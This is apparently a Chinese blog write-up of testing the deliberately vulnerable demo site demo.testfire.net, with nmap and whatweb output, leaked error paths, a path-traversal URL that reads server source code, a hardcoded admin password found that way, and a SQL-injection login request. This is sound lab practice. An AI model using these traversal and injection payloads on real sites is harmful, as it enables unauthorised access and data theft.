demo.testfire.net

span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; }.CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; }.cm-searching {background: #ffa; background: rgba(255, 255, 0, .4);}.cm-force-border { padding-right: .1px; }@media print { .CodeMirror div.CodeMirror-cursors {visibility: hidden;}}.cm-tab-wrap-hack:after { content: ""; }span.CodeMirror-selectedtext { background: none; }.CodeMirror-activeline-background, .CodeMirror-selected {transition: visibility 0ms 100ms;}.CodeMirror-blur .CodeMirror-activeline-background, .CodeMirror-blur .CodeMirror-selected {visibility:hidden;}.CodeMirror-blur .CodeMirror-matchingbracket {color:inherit !important;outline:none !important;text-decoration:none !important;}.CodeMirror-sizer {min-height:auto !important;}
-->
li {list-style-type:decimal;}.wiz-editor-body ol.wiz-list-level2 > li {list-style-type:lower-latin;}.wiz-editor-body ol.wiz-list-level3 > li {list-style-type:lower-roman;}.wiz-editor-body blockquote {padding: 0 12px;}.wiz-editor-body blockquote > :first-child {margin-top:0;}.wiz-editor-body blockquote > :last-child {margin-bottom:0;}.wiz-editor-body img {border:0;max-width:100%;height:auto !important;margin:2px 0;}.wiz-editor-body table {border-collapse:collapse;border:1px solid #bbbbbb;}.wiz-editor-body td,.wiz-editor-body th {padding:4px 8px;border-collapse:collapse;border:1px solid #bbbbbb;min-height:28px;word-break:break-word;box-sizing: border-box;}.wiz-hide {display:none !important;}
-->

信息搜集

域名

IP 端口信息

65.61.137.117

 
 
 
1
 
 
 
 
 
1
65.61.137.117
2














 


 








 


nmap 信息


root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT

Nmap scan report for 65.61.137.117

Host is up (0.60s latency).

Not shown: 995 closed ports

PORT     STATE    SERVICE      VERSION

80/tcp   open     http         Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

443/tcp  open     ssl/http     Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

| ssl-cert: Subject: commonName=demo.testfire.net

| Not valid before: 2014-07-01T09:54:37

|_Not valid after:  2019-12-22T09:54:37

|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.

445/tcp  filtered microsoft-ds

514/tcp  filtered shell

4444/tcp filtered krb524

Device type: general purpose

Running: Microsoft Windows XP|7|2012

OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012

OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Network Distance: 2 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:

|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s


TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   5.10 ms  192.168.245.2

2   26.32 ms 65.61.137.117


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117








2




Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT








3




Nmap scan report for 65.61.137.117








4




Host is up (0.60s latency).








5




Not shown: 995 closed ports








6




PORT     STATE    SERVICE      VERSION








7




80/tcp   open     http         Microsoft IIS httpd 8.0








8




| http-cookie-flags: 








9




|   /: 








10




|     amSessionId: 








11




|_      httponly flag not set








12




| http-methods: 








13




|_  Potentially risky methods: TRACE








14




|_http-server-header: Microsoft-IIS/8.0








15




|_http-title: Altoro Mutual








16




443/tcp  open     ssl/http     Microsoft IIS httpd 8.0








17




| http-cookie-flags: 








18




|   /: 








19




|     amSessionId: 








20




|_      httponly flag not set








21




| http-methods: 








22




|_  Potentially risky methods: TRACE








23




|_http-server-header: Microsoft-IIS/8.0








24




|_http-title: Altoro Mutual








25




| ssl-cert: Subject: commonName=demo.testfire.net








26




| Not valid before: 2014-07-01T09:54:37








27




|_Not valid after:  2019-12-22T09:54:37








28




|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.








29




445/tcp  filtered microsoft-ds








30




514/tcp  filtered shell








31




4444/tcp filtered krb524








32




Device type: general purpose








33




Running: Microsoft Windows XP|7|2012








34




OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012








35




OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012








36




Network Distance: 2 hops








37




Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows








38












39




Host script results:








40




|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s








41












42




TRACEROUTE (using port 1723/tcp)








43




HOP RTT      ADDRESS








44




1   5.10 ms  192.168.245.2








45




2   26.32 ms 65.61.137.117








46












47




OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .








48




Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds








49


















 


 








中间件


root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/

http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/








2




http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]














 


 








总结




  • windows 服务器 , asp.net (aspx) . iis8
    • 

  • 靶机网站, 域名, cdn 等信息无需搜集




 


漏洞挖掘


错误日志,泄露物理路径


GET 请求访问 http://demo.testfire.net/comment.aspx






 


 


 












 


 


 




 








 


 




1




An Error Has Occurred








2




Summary:








3




Value cannot be null.








4












5




Error Message:








6




System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


疑似程序路径


c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31




 


 


 














x




 


 




 








 


 




1




c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31














 


 








 


登录处无验证码 ( maybe 暴力破解)






 


 


 














x




 


 




 








 


 




1




http://www.altoromutual.com/bank/login.aspx














 


 








 


任意文件内容读取


 


查看 login.aspx 的源代码






 


 


 














x




 


 




 








 


 




1




http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt














 


 








给出不存在的文件会报出目录信息


Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.

            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)

            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)

            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)

            at System.IO.StreamReader..ctor(String path)

            at System.IO.File.OpenText(String path)

            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42

            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70

            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)

            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)

            at System.Web.UI.Control.OnLoad(EventArgs e)

            at System.Web.UI.Control.LoadRecursive()

            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)




 


 


 












 


 


 




 








 


 




1




Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








2




        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.








3




            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








4




            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)








5




            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)








6




            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)








7




            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)








8




            at System.IO.StreamReader..ctor(String path)








9




            at System.IO.File.OpenText(String path)








10




            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42








11




            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70








12




            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)








13




            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)








14




            at System.Web.UI.Control.OnLoad(EventArgs e)








15




            at System.Web.UI.Control.LoadRecursive()








16




            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


读取 /admin/login.aspx 的源码 拿到 管理员的密码


if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")




 


 


 














x




 


 




 








 


 




1




if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234") 














 


 








SQL 注入


POST /bank/login.aspx HTTP/1.1

Host: demo.testfire.net

Content-Length: 45

Cache-Control: max-age=0

Origin: http://demo.testfire.net

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://demo.testfire.net/bank/login.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288

Connection: close


uid=hac425%27&passw=%27%27%27&btnSubmit=Login




 


 


 












 


 


 




 








 


 




1




POST /bank/login.aspx HTTP/1.1








2




Host: demo.testfire.net








3




Content-Length: 45








4




Cache-Control: max-age=0








5




Origin: http://demo.testfire.net








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://demo.testfire.net/bank/login.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288








14




Connection: close








15












16




uid=hac425%27&passw=%27%27%27&btnSubmit=Login














 


 








 


写文件


貌似只能写 txt , 写 aspx 访问不了


POST /comment.aspx HTTP/1.1

Host: www.altoromutual.com

Content-Length: 111

Cache-Control: max-age=0

Origin: http://www.altoromutual.com

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://www.altoromutual.com/feedback.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004

Connection: close


cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+




 


 


 














x




 


 




 








 


 




1




POST /comment.aspx HTTP/1.1








2




Host: www.altoromutual.com








3




Content-Length: 111








4




Cache-Control: max-age=0








5




Origin: http://www.altoromutual.com








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://www.altoromutual.com/feedback.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004








14




Connection: close








15












16




cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+














 


 








 


 


 


 


 


 


 


 


 
												


											
demo.testfire.net 靶场测试流程记录的更多相关文章
	

    
								
  1. 利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库)
		
    利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库),完成预期的任务,大致有下面几步: 1.代码提交到github平台 2.创建.podspec 3. ...
    
		
    2. 
						
  2. 互联网App应用程序测试流程及测试总结
		
    互联网App应用程序测试流程及测试总结 1. APP测试基本流程 1.1流程图 仍然为测试环境 Pass 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日 ...
    
		
    3. 
						
  3. web测试流程的总结及关注点
		
    项目的测试流程大只包含的几个阶段:立项.需求评审.用例评审.测试执行.测试报告文档 一.立项后测试需要拿到的文档 1.需求说明书 2.原型图(及UI图) 3.接口文档 4.数据库字典(表的数量.缓存机 ...
    
		
    4. 
						
  4. 抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程
		
    转自:http://www.51testing.com/html/80/n-3726980.html   抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程 发表于:2018-6-06 11: ...
    
		
    5. 
						
  5. web手工项目01-系统组织框架-测试流程-需求评审-测试计划与方案
		
    回顾 SVN(定义,作用,使用操作) 软件缺陷(定义,表现形式,原因和根源,基本内容,跟踪流程) JIRA(基本介绍,使用者,工作流,问题,使用) 学习目标 掌握WAMP的环境搭建 掌握熟悉项目的步骤 ...
    
		
    6. 
						
  6. APP测试流程梳理
		
    APP测试流程梳理 1 APP测试基本流程 1.1流程图 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日),根据项目情况以及版本质量可适当缩短或延长测试 ...
    
		
    7. 
						
  7. 【转载】基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)——介绍、安装准备、安装、config文件以及运行脚本介绍
		
    基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)--介绍.安装准备.安装.config文件以及运行脚本介绍 其他 2018-0 ...
    
		
    8. 
						
  8. ltp 测试流程及测试脚本分析
		
    LTP介绍 (2011-03-25 18:03:53) 转载▼ 标签: ltp linux 压力测试 杂谈 分类: linux测试 LTP介绍 一.LTP介绍1.简介LTP(Linux Test Pr ...
    
		
    9. 
						
  9. 【腾讯优测干货分享】如何降低App的待机内存(二)——规范测试流程及常见问题
		
    本文来自于腾讯优测公众号(wxutest),未经作者同意,请勿转载,原文地址:https://mp.weixin.qq.com/s/806TiugiSJvFI7fH6eVA5w 作者:腾讯TMQ专项测 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Collection、Set、List概念上的区别及关联
			
    类图如下:
    
			
    2. 
						
  2. 剑指offer四十九之把字符串转换成整数
			
    一.题目 将一个字符串转换成一个整数,要求不能使用字符串转换整数的库函数. 数值为0或者字符串不是一个合法的数值则返回0 二.思路 详见代码. 三.代码 public class Solution { ...
    
			
    3. 
						
  3. 剑指offer三十五之数组中的逆序对
			
    一.题目 在数组中的两个数字,如果前面一个数字大于后面的数字,则这两个数字组成一个逆序对.输入一个数组,求出这个数组中的逆序对的总数P.并将P对1000000007取模的结果输出. 即输出P%1000 ...
    
			
    4. 
						
  4. Filter应用之-验证用户是否已经登录
			
    过滤器: public class LoginFilter implements Filter{ @Override public void init(FilterConfig filterConfi ...
    
			
    5. 
						
  5. html的css选择器
			
    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...
    
			
    6. 
						
  6. Go语言学习笔记十二: 范围(Range)
			
    Go语言学习笔记十二: 范围(Range) rang这个关键字主要用来遍历数组,切片,通道或Map.在数组和切片中返回索引值,在Map中返回key. 这个特别像python的方式.不过写法上比较怪异使 ...
    
			
    7. 
						
  7. tomcat启动(六)Catalina分析-StandardServer.start()
			
    从链接 Tomcat中组件的生命周期管理公共接口Lifecycle 可以知道调用的是StandardServer.startInternal() @Override protected void st ...
    
			
    8. 
						
  8. 05-python中的异常
			
    python的所有的异常都继承自基类: Exception 处理方式和java类似: path = raw_input('input the path') array = path.split('/' ...
    
			
    9. 
						
  9. redis集群与分片(2)-Redis Cluster集群的搭建与实践
			
    Redis Cluster集群 一.redis-cluster设计 Redis集群搭建的方式有多种,例如使用zookeeper等,但从redis 3.0之后版本支持redis-cluster集群,Re ...
    
			
    10. 
						
  10. I/O模式总结
			
    进程读取数据时要经过两个阶段: 1.等待内核准备数据: 2.将内核缓冲区中的数据复制到进程缓冲区中. 一.阻塞IO 进程会阻塞在等待内核准备数据和数据从内核空间复制到用户空间这两个阶段. 二.非阻塞I ...
    
			
    11.